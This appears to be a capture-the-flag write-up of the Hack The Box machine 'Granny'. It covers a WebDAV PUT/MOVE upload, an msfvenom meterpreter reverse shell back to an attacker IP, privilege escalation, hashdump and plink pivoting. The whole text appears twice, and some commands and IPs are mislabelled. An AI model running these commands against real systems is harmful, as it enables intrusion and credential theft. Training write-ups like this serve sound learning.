Hello, Today we are going to solve another hack the box.eu platform challenge “Granny”. This write-up is for those who want to increase their skills in penetration testing and black box testing. So, lets get started.
OS: Windows, IP - 10.10.10.15
Enumeration:
We begin with a nmap scan which reveals http port 80/tcp is open running Microsoft IIS httpd 6.0
Exploring the IP in the browser results to a web page which yields nothing. The source code has nothing remarkable either.
Since the nmap results stated the PUT command is allowed and the webdav type is unknown, we do a davtest like so; davtest -url http://10.10.10.15. The webdav enumeration has some PUT's that succeeded on html and txt.
To find out what davtest is doing, we fire-up burp and bind it to port 80 and redirect the request handling to 10.10.10.15 on port 80. We then run davtest on localhost (davtest -url http://localhost). HTTP history on burp shows us what burp is doing and we forward the request to repeater to test it.
Exploitation:
We PUT fresec.html and see that the file is created. When we go to http://10.10.10.15/fresec.html, we see the output "this is a test". This shows that we can upload our backdoor. we also see that it's powered by ASP.NET, so this is the file extension that will be executed.
We use msfvenom to create out reverse shell (msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=1337 -f aspx) and start up msfconsole to start our handler. use exploit/multi/handler set LHOST 10.10.14.20 set LPORT 1337 set payload windows/meterpreter/reverse_tcp exploit -j
Next copy the payload into burp and change the format from html to aspx.
Upon uploading our payload via burp, we get a denied because the extension being executed is html. Googling the MOVE OPTION/method to help us execute aspx shows; move a file name to a destination like in the example below;
MOVE /pictures/lion.html HTTP/1.1
Destination: /pictures/lion.aspx
Host: webdav.yandex.ru
We click go, browse to http://10.10.10.15/fresec.aspx and see no 404 errors. When we check our handler, a session is opened!
Next we use post/multi/recon/local_exploit_suggester, set session 1 and run to gather potential local exploits for this box.
If the meterpreter session dies, use post exploitation for migrating the current process to another process by executing following module. use post/windows/manage/migrate msf post(windows/manage/migrate)>set session 1 msf post(windows/manage/migrate)> run The exploit suggester has a couple exploits but for priv esc i chose to use the pprFlattenRec Local Privilege Escalation module (last one) set Lhost to tun0/eth0 whatever yours is if you run into issues with a different IP being loaded by the module. We correct that and get the SYSTEM SHELL :)
Running the nestat -an command we see localhost listening on different port. Next we try to port foward to it by; portfwd -h portfwd add -l 445 -p 445 -r 127.0.0.1 we can then bypass the firewall by nmap -p 445 -n -sC localhost from our kali box. We also do a hashdump and grab a couple of hashes for offline cracking.
Pivoting.
In your kali box, locate plink which is part of putty:/usr/share/windows-binaries/plink.exe. It establishes a ssh tunnel back to us. On your meterpreter shell, check directories and cd to inetpub as we can write to it.Then cd to wwwroot. Next, upload plink to meterpreter using the upload command and from the path it's saved to :upload /root/htb/granny/plink.exe
Add a new user fresec and go to your /etc/passwd file and add user as /bin/false since you don't want the new user to execute commands. "fresec:x:1001:1001::/home/fresec:/bin/false". You can change the password for this new user to password. Restart the ssh service (service ssh restart) from your kali box and you can test to see if it's working by netstat -alnp | grep 22 | grep LIST. Next shell command to open shell in meterpreter and foward your connection to 10.10.14.20 (us on kali) on port 8000 and tell it not to execute any commands once a connection is established by -N. "plink.exe -l fresec -pw password -L 10.10.10.15:8000:10.10.14.20:8000 -N 10.10.14.20". On kali start a listener on port 8000 and on a separate kali shell run the command nc 10.10.10.15 8000 to connect to granny and we get a connection to verify port forward works. Background the session using ctrl+z and then we are going to add a route next with the command: route add 10.10.10.14 255.255.255.255 1. .14 is grandpa IP and 1 is session 1. show options set LHOST 10.10.10.15 (granny's IP) set LPORT 8000 set RHOST 10.10.10.15 (granpas) run shell ipconfig (to verify you are on 10.10.10.14)
OS: Windows, IP - 10.10.10.15
Enumeration:
We begin with a nmap scan which reveals http port 80/tcp is open running Microsoft IIS httpd 6.0
Exploring the IP in the browser results to a web page which yields nothing. The source code has nothing remarkable either.
Since the nmap results stated the PUT command is allowed and the webdav type is unknown, we do a davtest like so; davtest -url http://10.10.10.15. The webdav enumeration has some PUT's that succeeded on html and txt.
To find out what davtest is doing, we fire-up burp and bind it to port 80 and redirect the request handling to 10.10.10.15 on port 80. We then run davtest on localhost (davtest -url http://localhost). HTTP history on burp shows us what burp is doing and we forward the request to repeater to test it.
Exploitation:
We PUT fresec.html and see that the file is created. When we go to http://10.10.10.15/fresec.html, we see the output "this is a test". This shows that we can upload our backdoor. we also see that it's powered by ASP.NET, so this is the file extension that will be executed.
We use msfvenom to create out reverse shell (msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=1337 -f aspx) and start up msfconsole to start our handler. use exploit/multi/handler set LHOST 10.10.14.20 set LPORT 1337 set payload windows/meterpreter/reverse_tcp exploit -j
Next copy the payload into burp and change the format from html to aspx.
Upon uploading our payload via burp, we get a denied because the extension being executed is html. Googling the MOVE OPTION/method to help us execute aspx shows; move a file name to a destination like in the example below;
MOVE /pictures/lion.html HTTP/1.1
Destination: /pictures/lion.aspx
Host: webdav.yandex.ru
We click go, browse to http://10.10.10.15/fresec.aspx and see no 404 errors. When we check our handler, a session is opened!
Next we use post/multi/recon/local_exploit_suggester, set session 1 and run to gather potential local exploits for this box.
If the meterpreter session dies, use post exploitation for migrating the current process to another process by executing following module. use post/windows/manage/migrate msf post(windows/manage/migrate)>set session 1 msf post(windows/manage/migrate)> run The exploit suggester has a couple exploits but for priv esc i chose to use the pprFlattenRec Local Privilege Escalation module (last one) set Lhost to tun0/eth0 whatever yours is if you run into issues with a different IP being loaded by the module. We correct that and get the SYSTEM SHELL :)
Running the nestat -an command we see localhost listening on different port. Next we try to port foward to it by; portfwd -h portfwd add -l 445 -p 445 -r 127.0.0.1 we can then bypass the firewall by nmap -p 445 -n -sC localhost from our kali box. We also do a hashdump and grab a couple of hashes for offline cracking.
Pivoting.
In your kali box, locate plink which is part of putty:/usr/share/windows-binaries/plink.exe. It establishes a ssh tunnel back to us. On your meterpreter shell, check directories and cd to inetpub as we can write to it.Then cd to wwwroot. Next, upload plink to meterpreter using the upload command and from the path it's saved to :upload /root/htb/granny/plink.exe
Add a new user fresec and go to your /etc/passwd file and add user as /bin/false since you don't want the new user to execute commands. "fresec:x:1001:1001::/home/fresec:/bin/false". You can change the password for this new user to password. Restart the ssh service (service ssh restart) from your kali box and you can test to see if it's working by netstat -alnp | grep 22 | grep LIST. Next shell command to open shell in meterpreter and foward your connection to 10.10.14.20 (us on kali) on port 8000 and tell it not to execute any commands once a connection is established by -N. "plink.exe -l fresec -pw password -L 10.10.10.15:8000:10.10.14.20:8000 -N 10.10.14.20". On kali start a listener on port 8000 and on a separate kali shell run the command nc 10.10.10.15 8000 to connect to granny and we get a connection to verify port forward works. Background the session using ctrl+z and then we are going to add a route next with the command: route add 10.10.10.14 255.255.255.255 1. .14 is grandpa IP and 1 is session 1. show options set LHOST 10.10.10.15 (granny's IP) set LPORT 8000 set RHOST 10.10.10.15 (granpas) run shell ipconfig (to verify you are on 10.10.10.14)
Comments
Post a Comment